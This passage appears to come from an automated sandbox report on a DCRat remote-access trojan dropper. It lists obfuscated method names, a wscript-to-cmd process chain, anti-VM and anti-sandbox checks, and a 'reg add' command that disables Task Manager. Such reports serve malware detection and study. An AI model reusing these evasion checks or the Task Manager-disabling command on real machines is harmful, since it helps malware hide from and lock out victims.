        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, LgQlvsq1fd4GLlZO7un.csHigh entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 'dN38cZNgyg', 'lVL8nu7E1W', 'r8j', 'LS1', '_55S'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, cXLSEkPLso0SuIxKNFk.csHigh entropy of concatenated method names: 'Xy8NCGWVHB', 'a8MNByMa31', 'j8LNJ1NxY6', 'jiYNYrERIX', 'WMoNIkkBCd', 'D5GgWGJskyxYZjmkaFK', 'y0LfPPJ2rNkYmkixARR', 'y0acxrJ1b2Cy6GTLmGi', 'RA3gnaJq9cco4SC0uql', 'lWmsmmJK6MbnLk0vIuD'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, xA6myBUmJWuFuejtd0t.csHigh entropy of concatenated method names: 'OQggN0yLhT', 'S6mgvnrSMi', '_8r1', 'QpHgQaMC8g', 'qcsg3fDn7B', 'f7YgalsGWf', 'g2ygetnRBw', 'FWrn4SgWFkYDZJJhidA', 'okfD74gE67J4Ard17MQ', 'W2IDRigUwT4CwSlPMG6'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, cfirBikMyuF0NJd9hI.csHigh entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'lgrTIsqs4CsUKjgg87y', 'W96UIuq2qBtBPGJx4aa', 'MGNaUIqKkrvXLYRDqfB', 'ULfOCvqFcu8LvEEdfQE', 'BIuVcWqwbBhg04bLScG', 'i2wlfqq8DNwdUoZnamT'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, u6w8V6P0sHk3M94Tfxl.csHigh entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'DwBQ3SVnNO', 'noYmbclgis', 'Te1QafVvfC', 'f1qm7K0sxA', 'MS2eqGL3QfKqi0qus9T', 'rcGEMRLSt4psk3GMkcQ', 'yIs2sXLvEDP7E3kN1sU'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, rSCRYfRVvL4MOhUsEN.csHigh entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'DLJcyLOcsfBP0tgmPSG', 'tJYHo0O6NTgJTa2WIQq', 'G5n04SOz9M6qFk7vEWX', 'MwKFu7h0gHDKdAkt8Ps', 'xNM1pQhZ280LNpwDCQh', 'V02UpNhOt3BAj10Olto'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, qCh7AGmrbZyin7F1pXs.csHigh entropy of concatenated method names: 'ULCHhh7AGb', 'DhNqBeEcDRKs28ZM0cI', 'z6oGY9E6OeQ403Ot3Xy', 'aVBM64EMv8OGgAX4pm8', 'xYf5teE9yupVNLrwnHS', 'JgD3VEEzT9nv69qphQt', 'mdU606U0D2E7gShSt4p', 'YMHDUoUZrrSxYIMKtUs', 'AuWqGWUODMUdyiutZrd', 'IZHO4IUhPXL0dtg3nUa'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, uAjvsaqTrjr1l9NsKBY.csHigh entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'A1aj6kYt8M', '_3il', 'VXkjbN4vhb', 'H8Sjmtc5qZ', '_78N', 'z3K'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, EdDjpZUyTmaorVTSv69.csHigh entropy of concatenated method names: 'pmqGvHuiKR', 'mWWGQhq4LQ', 'VlbG34tTij', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'Y0cGaWJ5RT'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, sfYaKdUxB6EWd7KPOWS.csHigh entropy of concatenated method names: 'uwBySgLwtm', 'g7aX6UXCBV4vyYBtdnY', 'T2dAXZXf56PS8sSgqOX', 'w6x9wbXTQ3wlQ05otPn', 'RN5loqXQj7AuOZeAYGi', '_1fi', 'JFG70Lyy06', '_676', 'IG9', 'mdP'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, XbqtbvbbfodLQvgm25a.csHigh entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'aGJXFBs4efymj4cMGjt', 'qQEj3UsuFZ40ipFpVhW', 'V75Yt6smbBiTDfPxpxh', 'aah0OcsJ7oDoJ8y6gXO', 'wajwnisNK1tEbfDeSrY', 'FV1qblsLikVuNgPqQik'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, oukyflHIV9vkukgnQV2.csHigh entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'MyfXoxN6R7', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, xbfvEpPzhN79weF8fQX.csHigh entropy of concatenated method names: 'XCYQ7nGGVP', 'qF5Qyl1Uel', 'ltRQhZG0Rp', 'OeeD2GYDk6MPkTZJSKb', 'IXqfxdYGq1dGdU4qRtU', 'MOd2UiYStEWS6jloXdV', 'BcQwlCYgHRtLrwivO8F', 'hHCAicYXTk4CgIWKclo', 'K1vPo7YBL1ZTwFVqWVr', 'cdHXHgYk8CTHlgUYqCm'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, xUiaEnbYYGQ9OPre24x.csHigh entropy of concatenated method names: 'L1Fmih2G7h', 'rIrQraHsvwm28Uni4Qq', 'DxOTEwH2aCRQRfJnXjH', 'AcSR1oH1K5OB6kTYSd0', 'JgOWkSHqQKWCMVF1wRw', 'kclg7KHKBNpGPTvWVqw', '_5q7', 'YZ8', '_6kf', 'G9C'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, D3KjwKmWG7uabih5HK5.csHigh entropy of concatenated method names: 'T88UN1R0OI', 'JR9UvgWLem', 'YJJbHJUyVJAs2UY4NCe', 'E00iVFUMagYBZrBTKK9', 'HHRB6yUp2eONXOKvfQD', 'd9CAbYUlPuC6wlEM51m', 'wrSU9uEMjx', 'oCap0Oa0GopjORWGVFK', 'qREJsFaZuBEYCl1Fu3N', 'jwdWvUU63XxrvWu2C6x'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, BwiitQUoqrWsOmcG99a.csHigh entropy of concatenated method names: 'IGD', 'CV5', 'Nq6gTV3Dqx', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, WcccVXHCjyY579IXg4s.csHigh entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, nVDBaaHuLHB0LqVhQgV.csHigh entropy of concatenated method names: 'vRUTM2CpGu', 'UoATkKb4ey', 'YOST1rjsgp', 'B0ZgomVgyIyNam2M5ir', 'CjURK6V3MupLc8xNlyQ', 'fF6TDtVSHCSei9HAm8j', 'B8pFPwVD8AuNYVEGWDo', 'BDS3nRVGiTIu1QM0pXh', 'HbMBVCVXW134YYBrJ0q', 'SJiHeiVBn3hmJeXOEQb'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, wIloE7mmFThkiWYrbiv.csHigh entropy of concatenated method names: 'H0mmMGhFeg', 'MHDmklRcGJ', 'DTpm1JN4fw', 'CArm0BtgdO', 'LBImCVcyNe', 'p1imBdjgVJ', 'k6ic4H7UuKWmdhEBpi6', 'n4pJU37aiTA2kX3AvUS', 'sKmmHv7WqynmExUlRrc', 'Dj29tT7EJSNSU433gBN'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, VnGGVPqELF5l1UeletR.csHigh entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, qVYvML0ZCF1C7tja99.csHigh entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'We5v9mqAiruvvINh4Rb', 'RpVK1EqWfFcjg5Tr8bV', 'i2umPeqEunYohq87b2E', 'sNTJ26qURkmnM53SM3g', 'AnJ55tqan2fb7QdLeiE', 'jhvk9Pq4CUQCuK9L4RE'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, NXBNoZm653aCs2jDbf7.csHigh entropy of concatenated method names: 'im6mXSyZJN', 'mFRmg6NDit', 'vwlmGNuPed', 'u9klxqHopacM4V7PIEw', 'dEfMeoHdfR2qQ7SJ2Ni', 'RJ3gZ9HeM8uVvulerVJ', 'T9WDYTHvbpGp4FjlCgA', 'Ofd6xsHVDllwEJ5wpkq', 'caNvseH3ho3x0TIaxgN', 'BGxYFYHfMA6ns9wfe3R'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, h5Ym2ZbuPwm7ye6VUI5.csHigh entropy of concatenated method names: 'Xf9bA073rc', 'XGVi6awO33CVmnOGr1X', 'XtiJdnwhHtN4n3nOtrS', 'PW08Osw0jMoHMZBsjCN', 'IwwUXXwZL3xPrPDP5ef', 'qv4vs5w10Fm0KhCKAsE', 'LpD3NMwqKtYSeJNn7wD', 'KQLNFMwsFSWCUMlNey3', 'QLZbMCF1C7', 'tYWcsYwFFPbkapi6UBG'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, D8RrC6UOVRvt2xPTKuk.csHigh entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'GVrGXJXvxH', 'hRvGgXn8qL', 'ceNGGM9JvL', 'GXAG7fLpyo', 'Qy5GyrSJfr', 'C9SGhTmoNs', 'Jj07TQGVCu2tY2S0nIF'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, DyXIbg4X7bZKIS6VqvT.csHigh entropy of concatenated method names: 'UGHOT8TohA', 'nCOOX8GGMs', 'MdHOgxo9J6', 'fKWOGuro9L', 'QOCO74g2nD', 'e6HOyJAxNS', 'xl7OhM0eHm', 'YDXOuH0rw3', 'aS6OOxqk0M', 'ySYO22tNXM'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, WViNycqF09jXatSGsON.csHigh entropy of concatenated method names: '_7zt', 'TO7eiSpGGJ', 'W8Xe5XX1SL', 'MWtedGrrm4', 'FOYesMGl2j', 'WnfepKSPGR', 'UeFeoyfPiP', 'llEbMWINPDhR6qhc5b6', 'a8plkuILjg2ERlNnuYr', 'd7kPO2Imk1ddFL5nOsy'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, Txa3a3PbsSjWJF5kZw2.csHigh entropy of concatenated method names: 'IRN4hUnO0O', 'p304uuDhQx', 'ONr4O3Ookw', 'qLh42bXsCF', 'oeowymaz8UJ06S1RqDm', 'QamXtYacoYwZZLkd5i6', 'kRWZ6Ya6hJtdyVBGps1', 'Wp8ZrI40JK8RstQQ3TF', 'zg0Q3G4Z2NX5Cq6d43M', 'yrlPv54ONxJsB2NSHWF'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, aAL2jmbf1YZjfH3pKi6.csHigh entropy of concatenated method names: 'c0NmpwdU3L', 'sTgmorGArA', 'Vy8mT52VcI', 'C1fOoWH8yWYjMInNvl7', 'xxeHmxHFXPksdEW8TMU', 'KVcxIgHwNjyoSiKocXQ', 'jxF2wNHHRkbfEL6JN8R', 'HYkmn4H7XIw7prngUsq', 'oPrRSIHnV1XngfgxRuV', 'GgQRiKHic8rkUbdtwkL'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, jmwERV45LG4DSGDgqP.csHigh entropy of concatenated method names: 'MERjV5LG4', 'SfK8UtoMcgvYeqbIRQ', 'wvKFNLf5FvNyb6cb3s', 'lwX4iXt8KPtnECX7De', 'vgoZw7dwd9cqB9D4Xx', 'DaBmxqed13kR4BWddP', 'aIHmBaKhG', 'UWdPVh5pj', 'tD5qG2YtB', 'jRGH0DyJZ'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, S1TPmwq3Ey8GWVHBb8M.csHigh entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, gMoLSrE6w6aK7DYkc5.csHigh entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'Gkv8AUqlcKpLbU1g4up', 'MC0j9SqyEphnvIhuc9Y', 'z2qI0qqMGXLcuJelFCR', 'd2rVxsq9fxpg1UhsI7F', 'rf7YGnqcmH2dJRCuYc5', 'NYpklDq6gYCh97tSB9R'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, MlRcGJbiOTpJN4fwhAr.csHigh entropy of concatenated method names: 'bpDbhKgUbR', 'pSCvZAKUoFwJ9sH0f8q', 'wEmHXlKaAbUQeDPZRTu', 'HPgiYbKWPygHE97Yye2', 'odhXniKE9mobY6pCyiR', 'XMHhI3K4VfQfl2GdPD1', 'sKV73AKuvaM4mLndcVT', 'Qmu5OfKmqdhmMiwAtmW', 'HM8SeVKJS0WNn14CJQr', 'f28'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, EYQcOKq9j39rqcwn990.csHigh entropy of concatenated method names: 'zZYeqDhR1d', 'lSheHsX6H4', 'h5OeUj7w9v', 'hJDOdPIEalOfqvSxymG', 'juDQS8IUy8L2X83XC5O', 'IQW5trIABkLaj165Om7', 'OIXHutIWcEASIqBJwMN', 'eTKQdSIaOBpoMRG3dFp', 'alGoDaI4VGFEL7x3cxh', 'nEb2mcIuTLExHyRwMpT'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, SBG59CbLqG5MTRCxxSV.csHigh entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 'Gxfw0NK021u0Ctxh2wn', 'rt9WX2KZMgvEy5rhKAF', 'uQSLn0KOPfK1jf2LfQt', 'w9LIhZKhGQx7vUiuMxa', 'rgfVTIK1B9FN3eovSEO', 'HIGrh0Kq9S6PKyF9TY9'
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, JUtA4s439AO6LtqN3ZN.csHigh entropy of concatenated method names: 'NtZw24AANH1GA', 'svI5O6kAPQwV4VCymm5', 'snrI4wkWEltg82WYqNm', 'F1N3S4kExjPGolVIrS5', 'n7iR9qkU8YpfjQFloEr', 'PS6xaskaYpGQN5PIpnK', 'ONuIP9knYGIZTgBeCP3', 'fkVesXkifwCrKllJ19i', 'qX9gyQk4ZZnnQBQZHTy', 'HT2lwdkuJSA2NJeZ09i'
        Source: C:\Users\user\Desktop\loader.exeFile created: C:\blockcomwinsavescrt\containercomponentSaves.exeJump to dropped file
        Source: C:\Users\user\Desktop\loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Check if machine is in data center or colocation facility
        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
        Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
        Source: containercomponentSaves.exe, 00000004.00000002.1832051997.0000000002F81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeMemory allocated: 2D60000 memory reserve | memory write watchJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeMemory allocated: 1AF10000 memory reserve | memory write watchJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeWindow / User API: threadDelayed 1027Jump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeWindow / User API: threadDelayed 354Jump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exe TID: 4208Thread sleep count: 1027 > 30Jump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exe TID: 4208Thread sleep count: 354 > 30Jump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exe TID: 3652Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exe TID: 2536Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0010A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0010A5F4
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0011B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0011B8E0
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0011DD72 VirtualQuery,GetSystemInfo,0_2_0011DD72
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: loader.exe, containercomponentSaves.exe.0.drBinary or memory string: qeMUdv2ECFZbJWRUgHp
        Source: containercomponentSaves.exe, 00000004.00000002.1832051997.0000000002F81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hyper-v video
        Source: containercomponentSaves.exe, 00000004.00000002.1832051997.0000000002F81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
        Source: wscript.exe, 00000001.00000003.1803750678.0000000002C9B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
        Source: containercomponentSaves.exe, 00000004.00000002.1835718989.000000001BEA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\user\Desktop\loader.exeAPI call chain: ExitProcess graph end nodegraph_0-23589
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0012866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0012866F
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0012753D mov eax, dword ptr fs:[00000030h]0_2_0012753D
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0012B710 GetProcessHeap,0_2_0012B710
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0011F063 SetUnhandledExceptionFilter,0_2_0011F063
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0011F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0011F22B
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0012866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0012866F
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0011EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0011EF05
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeMemory allocated: page read and write | page guardJump to behavior
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockcomwinsavescrt\DKYQpYxB0fjo0It.vbe" Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockcomwinsavescrt\jwlZX38GInff6rIBqWRHehXwajI.bat" "Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\blockcomwinsavescrt\containercomponentSaves.exe "C:\blockcomwinsavescrt\containercomponentSaves.exe" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /fJump to behavior
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0011ED5B cpuid 0_2_0011ED5B
        Source: C:\Users\user\Desktop\loader.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0011A63C
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeQueries volume information: C:\blockcomwinsavescrt\containercomponentSaves.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0011D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0011D5D4
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0010ACF5 GetVersionExW,0_2_0010ACF5
        Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Disable Task Manager(disabletaskmgr)
        Source: C:\Windows\SysWOW64\reg.exeRegistry value created: DisableTaskMgr 1Jump to behavior
        Disables the Windows task manager (taskmgr)
        Source: C:\Windows\SysWOW64\reg.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

        Stealing of Sensitive Information

        barindex
        Yara detected DCRat
        Source: Yara matchFile source: 00000004.00000002.1832418118.0000000013067000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.1832051997.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: containercomponentSaves.exe PID: 7008, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Yara detected DCRat
        Source: Yara matchFile source: 00000004.00000002.1832418118.0000000013067000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.1832051997.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
